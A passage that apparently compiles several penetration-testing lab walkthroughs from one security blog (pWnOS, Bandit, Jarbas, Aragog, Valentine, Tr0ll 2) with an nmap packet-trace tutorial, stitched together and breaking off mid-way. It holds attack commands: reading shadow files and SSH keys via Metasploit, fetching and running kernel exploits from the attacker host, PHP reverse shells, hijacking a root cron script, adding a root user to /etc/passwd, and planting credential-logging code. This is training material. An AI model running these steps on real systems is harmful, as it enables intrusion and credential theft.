Hacking Articles|Raj Chandel's Blog

Hello friends today we are going to solve another CTF challenge “pWnOS-1.0” of the vulnhub labs. The level of this challenge is not so tough and its difficulty level is described as beginner/intermediate. You can download it from here https://www.vulnhub.com/entry/pwnos-10,33/

Vernerabilities:

· Arbitrary File Disclosure

· Privilege Escalation

· Weak Credentials

Penerating Methodlogies:

· Network Scaning (Nmap)

· Exploiting web application (Metasploit)

· Extracting arbitrary file

· 1st Method

· SSH Brute-force

· Spawning TTY shell (Via SSH rsa key)

· Kernel Privilege Escalation

· 2nd Method

· Cracking password hashes (John the ripper)

· Spawning TTY shell (via SSH login)

· Kernel Privilege Escalation

Let’s Begin!!

Start with netdiscover command to identify target IP in the local network, in my network 192.168.1.105 is my target IP, you will get yours.

Further let’s enumerate open and protocols information in the target’s network with help of nmap following command:

nmap –A 192.168.1.105

From its result we found port 22 for SSH and 80, 1000 for HTTP are open. Moreover webmin - a web interface is running over port 1000.

So I check related its exploit inside metasploit and luckily found it can be exploited by nasty people to disclose potentially sensitive information. So with help of following command we execute this exploit to extract /etc/passwd file from inside the victim’s vm.

use auxiliary/admin/webmin/file_disclosure

msf auxiliary(file_disclosure) > set rhost 192.168.1.105

msf auxiliary(file_disclosure) > exploit

As you can observe we have fetched available username of the victim’s system.

msf auxiliary(file_disclosure) > set rpath /etc/shadow

msf auxiliary(file_disclosure) > exploit

As you can observe we have also fetched shadow file of the victim’s system which hold password hashes.

msf auxiliary(file_disclosure) > set rpath /home/Obama/.ssh/authorized_keys

msf auxiliary(file_disclosure) > exploit

As you can observe that we got SSH authorized key and we can also enumerate username from inside the passwd. Now to obtain rsa key of SSH we can apply brute-force attack valid combination of authorized key and rsa key.

1st Method to Exploit

To do so we downloaded a tar file with help of following command.

wget https://github.com/offensive-security/exploit-database-bin-sploits.git

Then extract the tar file with help of following command:

tar vxjf 5622.tar.bz2

Move into extract folder and execute following for Grabbing valid combination of key.

cd rsa

grep -lr {authorized_key}

Great we successfully got rsa_key for authorized key.

Let’s login into SSH using above enumerated credential

ssh -i 2048/dcbe2a56e8cdea6d17495f6648329ee2-4679.pub obama@192.168.1.105

Yippeeee!! We logged in successfully, let’s find kernel details and then search its exploit.

uname -a

So we found C-program file for exploit 5092 inside kali, let’s transfer it into Victim’s machine.

Inside victim’s shell we run following to download kernel exploit in his VM and compile it then Got root access on executing

cd /tmp

wget http://192.168.1.107/5902.c

gcc5092.c -o shell

chmod 777 shell

./shell

Booommm! Here we have Root access.

2^nd Method

As you have seen that with the help of metasploit exploit we successfully fetched information of /etc/shadow file. So with the help of john we can crack the hash password of shadow file.

john wordlist=/usr/share/wordlists/rockyou.txt pass

So we got password h4ckm3 for vmware, let’s use it for SSH login.

ssh vmware@192.168.1.105

Now repeat above step for root privilege escalation and after exploiting its kernel, you get the root as shown in the image.

Hello friends!! Today we are going to solve a fun CTF challenge named “pWnOS: 2.0” presented on Vulnhub for practising Penetration Testing by pWnOS. This virtual machine is having intermediate to medium difficulty level. You can download the Lab from here.

Initial Configuration of Lab:

Configure your attacking platform to be within the 10.10.10.0/24 network range.

We set the VMWare’s Network Adapter to Host-Only but can set it to either NAT or Host-Only depending on your setup.

Lab Network Settings:

IP: 10.10.10.100 Netmask: 255.255.255.0 Gateway: 10.10.10.15

Goal: Get Root Shell.

Penetrating Methodologies

· Network Scanning (Nmap, netdiscover)

· Directory busting the server

· Getting Logon Credentials (Metasploit)

· Upload php reverse shell

· Get Limited Shell

· Enumerate Root Credentials

· Get Root

Let’s Start!!!

Usually we start by getting the IP Address of the Lab. In this case we already know the static IP address of the Lab, but still for the sake of doing it let’s do it.

netdiscover

Now let’s move towards enumeration in context to identifying the running services and open ports of victim’s machine by using the most popular tool Nmap.

nmap -A 10.10.10.100

Knowing port 80 is open in victim’s network I preferred to explore his IP in the browser. It seems a basic site with a login form and Register form.

But I tried to follow another set of direction by running a Web Content Scanner (dirb) and found the blog directory.

dirb http://10.10.10.100/

After finding the blog directory, I tried to open the blog directory in the browser, it gave another simple looking webpage when looked at the first glance seems not interesting but as we know that the authors of these labs usually like to hide in plain sight. So, I opened the source code of the Webpage.

And as I closely inspected the source code, I ran into the line shown in the screenshot, it is an important hint as it tells us that the Website runs on Simple PHP Blog and the Version 0.4.0.

Simple PHP Blog is also known as ‘sphpblog’. So, I searched for any possible exploits for sphpblog in Metasploit framework. I found a bunch of them. Among them, I though to try out the exploit/unix/webapp/sphpblog_file_upload.

In Metasploit Shell I ran the following command to exploit:

use exploit/unix/webapp/sphpblog_file_upload

msf exploit(sphpblog_file_upload) > set rhost 10.10.10.100

msf exploit(sphpblog_file_upload) > set uri /blog

msf exploit(sphpblog_file_upload) > exploit

This exploit failed to give us and any shell, but it gets creative and created a Logon Credentials as shown in the Screenshot.

Let’s use these credentials to Login

Username: WJx2Fp

Password: PiRpoM

(You will get a different set of Logon Credentials as the Exploit generated them unique every time.)

Logging In gave us some addition option in the Menu. Among which the Upload Image Option took my attention.

Upload image option opens a simple Upload webpage. Let’s try to upload the php-reverse-shell.php which is inbuilt in kali Linux from path: /user/share/webshells/php. Although uploading php files most probably will be not allowed.

Wow!! We successfully uploaded the php-reverse-shell directly. This is awesome.

So, I browsed to the location of the uploaded php file, which is 10.10.10.100/blog/images.(Found this location in the initial dirb scan)

Now let’s open the file and start netcat listen in a new terminal to get victim’s reverse connection.

nc -lvp 1234

We got an improper shell, let’s convert it into a proper shell using the python one-liner

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Now, traversing Directory to Directory, files to files, I ended up in the /var directory and here I found a php file named mysqli_connect.

On opening this file using cat, I found the root credentials

cat mysqli_connect.php

Root Credentials

Username: root

Password: ISIntS

Now let’s wrap up this lab by getting the root shell, for this I will using a ssh connection to the lab generated with the root credentials and as you can see in the screenshot given, we got the root shell.

ssh root@10.10.10.100

Hello friends! Today we are continuing to solve Bandit’s levels from Level 14. If you haven’t seen the previous part. It is strongly recommended to view the previous part.

Level 14-15

Level Goal

The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost.

In this goal, the clue is given that the password of next level can be retrieved by submitting the password of the current level. So, first we read the password of current level using cat.

cat /etc/bandit_pass/bandit14

And, then using telnet connecting with port 30000 which is given and then submitting the current level’s password.

telnet localhost 30000

We can see that, we got the next level’s password.

ssh bandit15@localhost

Now, this password will be used to connect with bandit15.

Level 15-16

Level Goal

The password for the next level can be retrieved by submitting the password of the current level to port 30001 on localhost using SSL encryption.

Helpful note: Getting “HEARTBEATING” and “Read R BLOCK”? Use -ign_eof and read the “CONNECTED COMMANDS” section in the manpage. Next to ‘R’ and ‘Q’, the ‘B’ command also works in this version of that command…

Here, we can’t connect with telnet because the localhost: 30001 using the SSL encryption. So, we’ll have to use openssl.

-ign_eof: inhibit shutting down the connection when end of file is reached in the input.

openssl s_client -connect localhost:30001 -ign_eof

We got password for next level: BfMYroe26WYalil77FoDi9qh59eK5xNr

Submitting the current level’s password, the next level’s password will be generated.

ssh bandit16@localhost

Now, we can connect with bandit16.

Level 16-17

Level Goal

The credentials for the next level can be retrieved by submitting the password of the current level to a port on localhost in the range 31000 to 32000. First find out which of these ports have a server listening on them. Then find out which of those speak SSL and which don’t. There is only 1 server that will give the next credentials, the others will simply send back to you whatever you send to it.

Here, first we need to find SSL opened port using NMAP.

nmap -A localhost -p 31000-32000

Now, we can see that, there is an open port 31790 listening on SSL. Then, we need to connect localhost on port.

openssl s_client -connect localhost:31790 [Use the current password]

Now, after submitting the current level’s password, we get the RSA PRIVATE KEY.

Copy this in tmp directory using text editor.

mkdir /tmp/raj_bandit16

cd /tmp/raj_bandit16

nano sshkey.private

Paste the copied text here.

We have all done now, use ssh for connect bandit17.

chmod 600 sshkey.private

ssh -i sshkey.private bandit17@localhost

Level 17-18

Level Goal

There are 2 files in the homedirectory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new

NOTE: if you have solved this level and see ‘Byebye!’ when trying to log into bandit18, this is related to the next level, bandit19

ls -la

diff passwords.new passwords.old

ssh bandit18@localhost

Level 18-19

Level Goal

The password for the next level is stored in a file readme in the home directory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.

We will try to connect to bandit19.

ssh bandit19@localhost

But, after the connecting, the connection get terminated.

So, we will use ‘–T’ to connect with bandit18.

ssh -T bandit18@localhost

Now, we are connected with bandit18 and we will list all the files inside in the bandit18 directory.

After listing the files, there is only a single file named ‘readme’. So, we will read this file using cat command.

It must be the password for bandit19.

cat readme

The above password is used to connect bandit19.

ssh bandit19@localhost

Level 19-20

Level Goal

To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used the setuid binary.

setuid:

According to goal, we need to execute the setuid binary file and by the help of that file we can only read the bandit20 which is inside the ‘/etc/bandit_pass’.

ls -la

./bandit20-do cat /etc/bandit_pass/bandit20

The above password is used for connect bandit20.

ssh bandit20@localhost

Level 20-21

Level Goal

There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).

Again, list it out all the files containing in the present directory.

There is a file named ‘suconnect’.

Let’s read the text using cat command.

ls –la

Here, I found the usage of the file. It is simple to use.

cat suconnect

I’m using the port 3222 to connect. Open the another bandit connection in another terminal for receive the password.

./suconncet 3222

Using netcat, we can start listening on port 3222.

nc -l 3222

The above password can be used to connect bandit21.

ssh bandit21@localhost

Before starting the Level 21 onwards, it is strongly recommended that read about cronjob.

Level 21-22

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

Here, we change the directory and go into ‘/etc/cron.d'. Then, we’ll see the files which are present in this directory.

There is a file named ‘cronjob_bandit22’. Let’s check it out, what does file contain?

cd /etc/cron.d

ls -la

This files contains a bash script, which is changing the permission of a file present in ‘/tmp’ directory.

Now read this file using cat.

cat cronjob_bandit22

cat /usr/bin/cronjob_bandit22.sh

cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

We got the password for bandit22. By using this password, we can connect bandit22.

ssh bandit22@localhost

Hello readers. We’d recently tried our hands on the vulnerable VM called Jarbas on vulnhub. It is developed to look like a 90s Portuguese search engine. It is made by Tiago Tavares. You can download the lab from here. The objective of this challenge is to get root shell.

Difficulty Level: Easy

Steps involved:

Method 1:

1. Port scanning and network discovery.

2. Directory enumeration.

3. Discovery of usernames and password hashes.

4. Cracking password hash.

5. Exploiting Jenkins on port 8080 using metasploit.

6. Discovering cronjob.

7. Modifying cronjob and replacing it with a custom command to set sticky bit on find.

8. Waiting 5 minutes for the sticky bit to get set.

9. Executing root command to read flag.

Method 2:

1. Exploiting Jenkins as above to get shell.

2. Using openssl to create a password hash.

3. Editing /etc/passwd file with our custom file.

4. Uploading it in /tmp folder.

5. Copying it in place of /etc/passwd.

6. Logging in as root using su binary.

Let’s get started then.

Method 1:

After running a netdiscover scan we figured out that the IP that DHCP allotted to the VM was 192.168.1.122 in my case.

So, we used nmap aggressive scan to discover opened ports on the VM.

nmap –A 192.168.1.122

There was a webpage associated with the VM so we opened it in browser.

When nothing seemed to impress us, we tried to enumerate the directories using directory buster.

Since, index.html is the default page and there was another HTML page available, we tried to open it in browser.

We found some password hashes in the access.html that we tried to crack it online on hashkiller.

WOW! We have three passwords in hand now.

Now, remember we had port 22 open in our nmap scan report, so we tried to login into ssh using the usernames and passwords we just cracked but it didn’t seem to work. So, we looked at another interesting port 8080 and opened it in browser.

We found a web application on Jenkins. It is an open source automation server written in Java. Jenkins helps to automate the non-human part of the software development process, with continuous integration and facilitating technical aspects of continuous delivery.

We tried to login with all three of the usernames and passwords but the third combination logged us into Jenkins which was:

eder: vipsu

Now, we found that Jenkins had a script console vulnerability and its module was in metasploit.

use exploit/multi/http/jenkins_script_console

msf exploit(jenkins_script_console) > set target 1

msf exploit(jenkins_script_console) > set rhost 192.168.1.122

msf exploit(jenkins_script_console) > set rport 8080

msf exploit(jenkins_script_console) > set USERNAME eder

msf exploit(jenkins_script_console) > set PASSWORD vipsu

msf exploit(jenkins_script_console) > exploit

We got a meterpreter session! Let’s try and get a teletype here using python’s one liner shell:

shell

python –c ‘import pty;pty.spawn(“/bin/bash”);’

Now, we found a shell script in the crontab which was executing automatically after every 5 minutes called CleaningScript.sh and whose job was to remove access log from the system.

cat /etc/crontab

cd /etc/script

cat CleaningScript.sh

But even better, it was running with root permissions!

Let’s make a new gedit file called CleaningScript.sh and use the root privilege of CleaningScript.sh file to set a sticky bit on “find.”

#!/bin/bash

chmod u+s /usr/bin/find

Now, all that was left to do was to upload this new shell script onto the server and replace it with the original file.

So, we background the shell (CTRL+Z)

and use meterpreter upload command.

upload /root/Desktop/CleaningScript.sh .

shell

python –c ‘import pty;pty.spawn(“/bin/bash”);’

date

We observed the time and waited for exactly 5 minutes for the script to run automatically.

After 5 mintes:

ls –la /usr/bin/find

Permissions modified: -rwsr-xr-x

Sticky bit got set! Now we just need to use the find inline command execution:

find /home –exec whoami \;

As you can see all the users got enumerated as root.

find /home –exec ls –la /root \;

Hence, we can execute any command as root now!!

A file called flag.txt was visible in the root directory.

find /home –exec cat flag.txt \;

Method 2:

For this method, we achieve the meterpreter session as above and then get a shell.

We used echo command this time to set sticky bit on /usr/bin/cp

echo “chmod u+s /usr/bin/cp” > CleaningScript.sh

We read the /etc/passwd file using cat utility after that.

Our aim was to add a user in /etc/passwd file as root. So, we use openssl utility to create a password hash with the command:

openssl passwd –l –salt user3 pass123

Copy the password hash in someplace safe now.

Copy the /etc/passwd file in a leafpad file and let’s add our custom user in there.

raj:$1$user3$:0:0:root:/root:/bin/bash

Save this file somewhere on desktop and download this file on server’s /tmp (universal writeable) directory.

Then use cp (since, we set sticky bit) to copy and replace this file with the original file with the command:

cp passwd /etc/passwd

Let’s try and login using su binary:

su raj

[password]: pass123

Voila! We got a root shell! Let’s read the flag now.

cd /root

cat flag.txt

So, that’s how we captured the flag in this VM. Happy Hacking.

Hello Friends!! Today we are going to solve another CTF Challenge “Aragog”. This VM is also developed by Hack the Box, Aragog is a Retired Lab and there are multiple ways to breach into this VM.

Level:Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

As these labs are only available online, therefore, they have a static IP. Aragog Lab has IP: 10.10.10.78.

Now, as always let’s begin our hacking with the port enumeration.

nmap -A 10.10.10.78

Looking around its result we found ports 21, 22 and 80 are open. Moreover we notice FTP anonymous login is allowed.

So we try to connect with FTP through anonymous login. Here I found text.txt file in current directory. Then with the help of get command we downloaded text.txt file in our local machine.

ftp 10.10.10.78

get test.txt

Inside test.txt file we observe something related to a subnet_mask in xml format, at this point I was confused where I can implement this hint.

Then we open target IP over web browser but didn’t found any remarkable thing here.

When we found nothing at port 80, then though to use dirbuster for web directory brute-force attack.

Here I found a /host.php file from its result.

When I have explored /host.php in the web browser I found a message “There are 4294967294 possible hosts for” as shown below image. So I search in Goggle for 4294967294 host which was related to 255.255.255.254 as found in above test.txt file.

It mean we can post test.txt file here with help of burpsuit.

So let’s capture the request and sent the intercepted data into repeater.

As we have predict the test.txt is in XML format so we have tried to validate XXE injection.

&xxe;

Luckily we found this is vulnerable to XXE injection.

Hence now I can simply exploit it for fetching /etc/passwd file with help of following XXE script and then check its response.

&xxe;

Great!! We got the /passwd file successfully and enumerated two local usernames.

With the help of /passwd file information we try to get id_rsa through XXE script.

&xxe;

Yuppiee! We got the ssh private key successfully, that I copied in text file and named as key.

Then assign permission 600 to saved key (id-rsa) and then try to connect with SSH as we knew the port 22 was open in the victim’s network.

cd Desktop

chmod 600 key

ssh -i key florian@10.10.10.78

And as you can observe that we get login successfully and accessed the TTY shell of victim’s machine, now let’s find the user.txt file to finish the 1^st task.

cd /home

cd /florian

cat user.txt

1^st task is completed; let’s find out root.txt to finish the 2^nd task.

Inside /var/www/html we saw /dev_wiki and it was good to see that this folder holds wordpress setup and configuration files.

So I simply add host IP: 10.10.10.78 and host name: aragog is our local host file which is present inside /etc.

So we explore aragog/dev_wiki in our web browser and got Worpress home page.

As you can observe inside /blog we found a message to Florian from Cliff where he had express the mess of wordpress restoring in very few minutes.

So with help of Google I found a script pspy32sand download it in victim’s VM inside /tmp and also gave execution permission.

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.

cd /tmp

wget http://10.10.14.6/ pspy32s

chmod +x pspy32s

After particular time we realize that there is a cronjob that is frequently deleting the dev_wiki folder & replacing it with the backup folder & a script wp-login.py is ran shortly after that process occurs.

Now let’s manipulate the content of wp-login.php file and place a new php code inside it to enumerate username and password.

echo “” > wp-login.php

nano wp-login.php

$req_dump = print_r($_REQUEST, TRUE);

$fp = fopen('/tmp/request.log', 'a');

fwrite($fp, $req_dump);

fclose($fp);

cat wp-login.php

So this file will dump the credential after few minutes inside /tmp.

cd /tmp

cat creds.txt

Administrator: !KRgYs(JFO!&MTr)lf

Hmm!!! We got the admin credential.

Now let’s grab the root.txt file quickly and finish this task.

su root

cd /root

cat root.txt

We finished both tasks successfully!!

Hello friends!! Today we are going to discussed how to capture network packet using nmap. And used wireshark for comparing its result from nmap. In this article we mainly focused on what types of network traffic is captured by nmap while we use various nmap ping scan.

Ping scan in nmap is done to check if the target host is alive or not. As we know that ping by default sends the ICMP echo request and gets an ICMP echo reply if the system is alive. Ping scan by default send an ARP packet and gets a response to check if the host is up.

NOTE: Nmap scans changes their behavior according to the network they are scanning.

· Scanning Local Network with Nmap where nmap sends an ARP packet with every scan.

· If an external network is to be scanned; nmap sends the following request packets:

ICMP echo request

ICMP timestamp request

TCP SYN to port 443

TCP ACK to port 80

Technique Involves in packet-tracing via nmap

The nmap module is an interface with nmap's internal functions and data structures. The API offers target host information such as port states and version detection results. It also provides an interface to the Nsock library for effective network I/O.

Nsock is a parallel sockets library used by NSE, service detection (service_scan.cc) and DNS (nmap_dns.cc). It acts as an abstraction layer above socket operations and is optimized for handling multiple sockets. mspool is defined at nsock_internal.h and contains among other things a struct event_lists which is a structure that keeps information on all pending events.

Event creation

Events are represented with the msevent struct (nsock_internal.h) which contains (among other things)

§ The callback handler -> nsock_ev_handler (nsock_pool, nsock_event, void *)

§ A pointer to a msiod struct -> msiod *iod, which holds all the I/O descriptor (IOD) related information.

§ Struct filespace iobuf (a buffer usually 1024 bytes which holds the write/read bytes)

§ The nse_type (nsock.h)

§ The nse_status (nsock.h)

§ A unique id -> nsock_event_id (EID)

Events are created with the the following special functions:

nsock_connect.c

· nsock_connect_tcp

· nsock_connect_udp

· nsock_connect_ssl

· nsock_reconnect_ssl

nsock_read.c

· nsock_readlines

· nsock_readbytes

· nsock_read

nsock_write.c

· nsock_write

· nsock_printf

nsock_timer_create.c

· nsock_timer_create

source: https://sock-raw.org/nmap-ncrack/nsock.html

Let’s Start!!

Nmap Sweep Ping Analysis

Attribute -sn/ -sP are used for sweep ping and they try to identify the live host in the network. Using --packet-trace along nmap scan we can observe the network packet.

nmap -sn 192.168.1.103 --packet-trace

Here you can observe first two packets SENT/RECD (received) showing ARP request packet from 192.168.1.105 to 192.168.1.103 and then used NSOCK libraries to state actual request and response packets travel between the source and destination router.

§ NSOCK INFO that denotes a new nsock_event_id (EID) 8 is generated to represents I/O descriptor (IOD) #1 for NSOCK UDP connection request to the router on port 53.

§ NSOCK INFO that denotes another (EID) 18 is generated to represents read request from (IOD) #1.

§ NSOCK INFO that denotes another (EID) 27 is generated to represents write request for 44 bytes to (IOD) #1.

§ NSOCK INFO that denotes SUCCESSFUL operation when nsock used callback_handler to connect for EID 8.

§ NSOCK INFO that denotes SUCCESSFUL operation when nsock used callback_handler to write for EID 27.

§ NSOCK INFO that denotes SUCCESSFUL operation when nsock used callback_handler to read for EID 18.

§ NSOCK info that IOD #1 is deleted.

§ NSOCK info that nevent_delete is deleting on event 34.

At last Nmap scan report Host is up.

You can observe the the same traffic we have captured from wireshark

§ Arp request packet for 192.168.1.105 to 192.168.1.103

§ Arp reply packet from 192.168.1.103 to 192.168.1.105

Similar you can also choose --reason option with nmap command to enumerate response from host network.

nmap -sn 192.168.1.103 --reason

As you can observe it has clearly shown Host is up, when received arp-response.

As we have seen, by default Nmap sent ARP packet to identify host status therefore now we will trace nmap packet when --disable-arp-ping is activated.

nmap -sn 192.168.1.103 --packet-trace --disable-arp-ping

Here you can notice the following SENT packets from source 192.168.1.105 to destination 192.168.1.103.

§ ICMP echo request

§ ICMP timestamp request

§ TCP SYN to port 443

§ TCP ACK to port 80

Then RCVD packet ICMP Echo-reply from destination 192.168.1.103 and then used NSOCK libraries to state actual request and response packets travel between source to the destination router.

Demonstrating working of Ping Sweep using wireshark

From given below image you can observe the following packet of request and reply between both network IP.

1. ICMP echo request

2. TCP SYN to port 443

3. TCP ACK to port 80

4. ICMP timestamp request

5. ICMP echo reply

6. TCP RST, ACK to port 443

7. TCP RST to port 80

8. ICMP timestamp Reply

nmap -sn 192.168.1.103 --disable-arp-ping --reason

Similar you can also choose --reason option with nmap command to enumerate response from host network.

nmap -sn 192.168.1.103 --disable-arp-ping--reason

As you can observe it has clearly shown Host is up, when received ICMP echo-response.

Nmap TCP-SYN Ping Analysis

Attribute -PS sends TCP SYN packet on port 80 by default; we can change it by specifying the ports with it, like: -P22.

nmap -PS -p22 192.168.1.103 --packet-trace

Here you can observe this scan is addition of nmap ping scan and nmap stealth scan because in the beginning it sends arp packet then uses nsock libraries and at the end again implicates TCP half communication.

So you can observe the following information we fetched from nmap:

§ SENT/RECD ARP request and reply respectively.

§ Nsock libraries details

§ TCP-SYN packet from 192.168.1.105:36088 to 192.168.1.103:22.

§ TCP-SYN/ACK packet from 192.168.1.103:22 to 192.168.1.105:36088.

Similarly we saw the same pattern of network traffic in wireshark.

Similar you can also choose --reason option with nmap command to enumerate response from host network.

nmap -PS -p22 192.168.1.103 --reason

Here you can observe port 22 is open and when received SYN/ACK packet from host.

Now let figure out network traffic when --disable-arp-ping activated.

nmap -PS -p22 192.168.1.103 --packet-trace --disable-arp-ping

So you can observe the following information we fetched from nmap:

§ SENT TCP-SYN packet on port 80

§ RCVD TCP-RST/ACK from port 80.

§ Nsock libraries details

§ TCP-SYN packet from 192.168.1.105:63581 to 192.168.1.103:22.

TCP-SYN/ACK packet from 192.168.1.103:22 to 192.168.1.105:63851.

Similarly we saw the same pattern of network traffic in wireshark also.

Nmap ICMP Ping Analysis

Attribute–PE sends ICMP echo request packet [ICMP type 8] and received ICMP echo reply packet

nmap -PS -PE 192.168.1.103 --packet-trace --disable-arp-ping

Here you can notice ICMP Echo-request packets SENT from source 192.168.1.105 to destination 192.168.1.103

Then RCVD packet ICMP Echo-reply from destination 192.168.1.103 and then used NSOCK libraries to state actual request and response packets travel between source to destination router.

Similarly we saw the same pattern of network traffic in wireshark also.

Nmap Stealth Scan Analysis

Let’s capture the network packet for default nmap scan also called stealth scan which follow TCP half communication

nmap -p22 192.168.1.103

Here you can observe TCP-half communication:

§ TCP-SYN packet sent from source 192.168.1.105 to 192.168.1.103 on port 22.

§ TCP-SYN, ACK packet received from source 192.168.1.103 to 192.168.1.105.

§ TCP-RST packet sent from source 192.168.1.105 to 192.168.1.103.

Now let’s verify it with parameter --packet-trace and compare the result.

nmap -p22 192.168.1.103 --packet-trace

So you can observe the following information we fetched from nmap which is similar as TCP-SYN Ping.

§ SENT/RECD ARP request and reply respectively.

§ Nsock libraries details

§ TCP-SYN packet from 192.168.1.105:48236 to 192.168.1.103:22.

§ TCP-SYN/ACK packet from 192.168.1.103:22 to 192.168.1.105:48236.

Similar you can also choose --reason option with nmap command to enumerate response from host network.

nmap -p22 192.168.1.103 --reason

Here you can observe port 22 is open and when received SYN/ACK packet from host.

Now let figure out network traffic when --disable-arp-ping activated.

nmap -p22 192.168.1.103 --packet-trace --disable-arp-ping

Here you can notice the following SENT packets from source 192.168.1.105 to destination 192.168.1.103.

§ SENT ICMP echo request

§ SENT TCP SYN to port 443

§ SENT TCP ACK to port 80

§ SENT ICMP timestamp request

§ Then RCVD packet ICMP Echo-reply from destination 192.168.1.103

§ Then used NSOCK libraries to state actual request and response packets travel between sources to destination router.

§ SENT TCP-SYN request on port 22

§ RECV TCP-SYN, ACK reply from port 22.

Similarly we saw the same pattern of network traffic in wireshark also.

Nmap TCP Scan Analysis

As we knew TCP scan is follow full tcp communication and it is known as three-way-handshake.

nmap -sT -p22 192.168.1.103 --packet-trace

So you can observe the following information we fetched from nmap which is similar as TCP-SYN Ping.

SENT/RECD ARP request and reply respectively.

Nsock libraries details

Connecting TCP Localhost from destination host 192.168.1.103:22 is in progress.

Connected TCP Localhost from destination host 192.168.1.103:22 successfully.

Similarly we saw the same pattern of network traffic in wireshark also.

Similar you can also choose --reason option with nmap command to enumerate response from host network.

nmap -sT -p22 192.168.1.103 --reason

Here you can observe port 22 is open and when received SYN/ACK packet from host.

Hello friends! Today we are going to solve the CTF challenge “Valentine” which is a vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have a very good collection of vulnerable labs as challenges from beginners to Expert level.

Difficulty Level: Medium

Task: find user.txt and root.txt file on victim’s machine.

Steps involved:

§ Port scanning and services detection

§ Web server directory enumeration

§ Discovery of hex encoded ssh key

§ Decoding key

§ Finding Passphrase

§ Capturing user flag

§ Capturing root flag

This lab has a static IP and IP of 10.10.10.79. So let’s start the CTF challenge with port scanning.

nmap –A 10.10.10.79

From its scanning result we found port 22 and 80 are open for ssh and http services.

Let’s enumerate the web service running on port 80. The below image could be a hint, there is a heart and blood. Does it mean heartbleed? Could be! Let’s enumerate further.

Let’s see what we can find by directory brute forcing:

Dirb http://10.10.10.79

It put so many files but /dev looks more interesting so Lets browse http://10.10.10.73/dev.

Great we found some directories here. Let’s manually check these directories one by one.

The directory “dev” seems very interesting, There are two files as shown in the below images.

Firstly I opened notes.txt file as shown in the below image, it seems there is some encoding and decoding is involved.

Then we opened another file hype_key and notice found encoded hex text, let’s convert it into plain text and see if it makes any sense.

With help of burp we try to decode above hex into plain text as shown in the image. So it’s a RSA private key, but it has space after each character, which needs to be fixed.

After removing space using sed command, we get our key as shown in the image below. Now all we need is a passphrase.

sed ‘s/ //g’ key> sshkey

cat sshkey

Checking if the HTTPS web service is vulnerable to heartbleed with help of nmap script.

nmap –p 443 –script ssl-heartbleed 10.10.10.79

As expected the service is vulnerable to heartbleed, now let’s try to exploit it.

Searching heartbleed exploit using searchsploit, and luckily found a python exploit 32764.py in our local system.

searchsploit heartbleed

So I copied the python exploit on the desktop and run against target’s IP for exploiting heartbleed.

python 32764.py 10.10.10.79

Wow! It worked perfectly as aspect.

As shown in the image above, there is a string. Let’s decode the string with the help of following command, it may give the passphrase for ssh login.

echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 –d

Now let’s try to login SSH using the key and passphrase and after making successful login we found user.txt file from inside /home/hype/Desktop

ssh –i keyhype@10.10.10.79

cd /home

cd hype

cd Desktop

cat user.txt

So we logged in successfully and captured the user flag. Here 1^st task is completed; let’s find out root.txt to finish the 2^nd task.

During further enumerating the history of commands on the system, we found some interesting commands

cat .bash_history

tmux –S /.devs/dev_sess

Hmm!!! We got the root as shown in last image.

Now let’s grab the root.txt file quickly and finish this task. On running the below command we got our Root flag.

cd /root

cat root.txt

We finished both tasks successfully!!

Hello everyone and welcome to this CTF challenge. This is the next part to Tr0ll by Maleus. You can download the lab from here. The objective of this lab is to get root and read the flag.

The level of this challenge is not so tough and its difficulty level is described as beginner/intermediate.

Penetrating Methodologies

§ Network scanning (Nmap, Netdiscover)

§ Information Gathering

§ Analysing web source code

§ Get robort.txt

§ Directory enumeration with the help of robots.txt (Dirb)

§ Found encoded answer.txt file

§ Decoding base64 text file

§ FTP login for Zip file

§ Cracking zip file (Fcrackzip)

§ Exploiting shellshock to get shell in bash.

§ Spwan tty shell (Metasploit)

§ Privilege escalation

§ Finding vulnerable binary

§ Finding EIP offset

§ Exploiting buffer overflow

§ Getting root flag

So, let’s get started!

First step is as always, IP grabbing. In my case the IP was 192.168.1.131

Next step was port scanning and discovery of open ports using nmap.

nmap -A 192.168.1.131

And we found 3 ports open- 21, 22, 80

So, we tried to open the IP in browser to see what was in the web page and sure as hell, that troll face again! It really did live up to its name after all!

So, we opened the home page’s source code using curl:

curl http://192.168.1.131

We, then enumerated the IP using dirb to find something interesting and something did catch our eyes—robots.txt

dirb http://192.168.1.131

So, we opened robots.txt in web browser and we saw a lot of directory names.

So, we downloaded robots.txt using wget and tried to make a dictionary out of it in hope that we find something good in one of them.

wget http://192.168.1.131/robots.txt

nano robots.txt

(Removed the ‘/’ from each line and saved it)

Enumerating it again with the custom dictionary we just made, few other directories were found.

dirb http://192.168.1.131/robots.txt

So, we hit each directory on browser and inspected each image since there was nothing else to play with in the directories.

One by one we started searching each directory but nothing appealed to us. It all had the same troll image.

We checked the source code of the page but nothing seemed good.

Hence, we downloaded cat_the_troll.jpg from each directory but one such directory called dont_bother had something interesting in its image.

wget http://192.168.1.131/dont_bother/cat_the_troll.jpg

We read the last three lines of the image’s coding using tail command:

tail –n 3 cat_the_troll.jpg

The code really said to look deep within “y0ur_self” to find the answer. Could it be a directory? lets find out.

Voila! It indeed is a directory and really has an answer in it. But on opening answer.txt, the dictionary seemed to be base64 encoded.

We again downloaded the answer.txt file using wget and decoded it into a new file decoded.txt

wget http://192.168.1.131/y0ur_self/answer.txt

Decoded it using:

base64 –d answer.txt>decoded.txt

Let’s save this dictionary for future use and move on to another port we discovered—the FTP port.

We had no idea of the username and password and neither was there any password or username file found.

But remember the very first source code we viewed? It had the author name Tr0ll.

Could that be the username and default password for FTP?

It was a complete hit and try method but we successfully got logged in!

